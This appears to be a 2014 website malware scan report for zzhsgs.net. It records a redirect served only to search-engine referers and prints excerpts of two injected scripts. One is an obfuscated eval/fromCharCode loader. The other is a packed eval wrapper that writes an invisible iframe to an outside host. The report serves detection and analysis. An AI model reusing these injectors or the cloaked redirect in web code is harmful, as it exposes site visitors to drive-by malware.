Malicious/Suspicious Redirects
Request | Server response | Status |
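URL: http://www.zzhsgs.net/ (request imitating a visitor arriving from a search engine) GET / HTTP/1.1 Host: www.zzhsgs.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 21 Jun 2014 04:26:42 GMT Location: http://www.522888.com/ Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | malicious |
The same URL is reported as 200 OK and clean under "Scanned pages/files" below, which suggests the redirect is served only when the Referer looks like a search engine; a check made without such a Referer may not see it.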
Scanned pages/files
Request | Server response | Status |
http://www.zzhsgs.net/ | 200 OK Content-Length: 54876 Content-Type: text/html | clean |
http://www.zzhsgs.net/ps/ps.js | 200 OK Content-Length: 10485 Content-Type: application/x-javascript | malicious |
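Malicious code - confirmed by antivirus engines (see below); the excerpt is truncated:
OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+
Reading of the visible part: the first eval() assembles `var l = function(x){return String.fromCharCode(x)}` from the string fragments, and the second eval() uses l() to spell out further code one character code at a time (the visible codes begin `O=function(m){return String.fromCharCode`). The excerpt ends before any payload, so what the script ultimately does cannot be determined from this page.
Antivirus reports: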
| ||
http://www.zzhsgs.net/base/js/base.js | 200 OK Content-Length: 31631 Content-Type: application/x-javascript | malicious |
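Malicious code - confirmed by antivirus engines (see below); the excerpt is truncated after `.s`:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 7=\\"2://3.4/b.c\\" a=\\"0\\" 8=\\"0\\" 9=\\"0\\"></1>");',13,13,'|iframe|http|winvvv|com|document|writeln|src|height|frameborder|width|cs|html'.s function getCookie(sName) { var aCookie = document.cookie.split("; "); for (var i=0; i < aCookie.length; i++){ var aCrumb = aCookie[i].split("="); if (sName == aCrumb[0]){ return unescape(aCrumb[1]); } } return null; } -->
Reading of the visible part: this is a packed eval(function(p,a,c,k,e,d){...}) wrapper. Assuming the truncated tail is the usual `.split('|')`, substituting the word list into the template yields a document.writeln() of an iframe with width, height and frameborder all set to 0, whose src is hxxp://winvvv[.]com/cs.html (defanged here), i.e. an invisible iframe added to every page that loads this script.
Antivirus reports: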
| ||
http://www.zzhsgs.net/base/js/common.js | 200 OK Content-Length: 10754 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/base/js/form.js | 200 OK Content-Length: 16332 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/base/js/blockui.js | 200 OK Content-Length: 12587 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/search/js/searchform.js | 200 OK Content-Length: 665 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/-1 | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.zzhsgs.net/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.zzhsgs.net/index.php | 200 OK Content-Length: 54876 Content-Type: text/html | clean |
http://www.zzhsgs.net/page/html/company.php | 200 OK Content-Length: 20988 Content-Type: text/html | clean |
http://www.zzhsgs.net/page/html/../../base/js/base.js | 200 OK Content-Length: 31631 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antivirus engines (see below); the excerpt is truncated after `.s`:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 7=\\"2://3.4/b.c\\" a=\\"0\\" 8=\\"0\\" 9=\\"0\\"></1>");',13,13,'|iframe|http|winvvv|com|document|writeln|src|height|frameborder|width|cs|html'.s function getCookie(sName) { var aCookie = document.cookie.split("; "); for (var i=0; i < aCookie.length; i++){ var aCrumb = aCookie[i].split("="); if (sName == aCrumb[0]){ return unescape(aCrumb[1]); } } return null; } -->
The URL for this entry normalizes to /base/js/base.js, which is listed earlier in this table with the same Content-Length (31631) and the same excerpt, so this is the same infected file reached through a relative path rather than a second infection.
Antivirus reports:
| ||
http://www.zzhsgs.net/page/html/../../base/js/common.js | 200 OK Content-Length: 10754 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/page/html/../../base/js/form.js | 200 OK Content-Length: 16332 Content-Type: application/x-javascript | clean |
http://www.zzhsgs.net/page/html/../../base/js/blockui.js | 200 OK Content-Length: 12587 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zzhsgs.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zzhsgs.net/
Result: zzhsgs.net is not infected or malware details are not published yet.
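Result: zzhsgs.net is not infected or malware details are not published yet.
Neither blacklist lists the site, although this scan flagged a malicious redirect and malicious scripts on it, so a clean blacklist result here does not show that the site is clean.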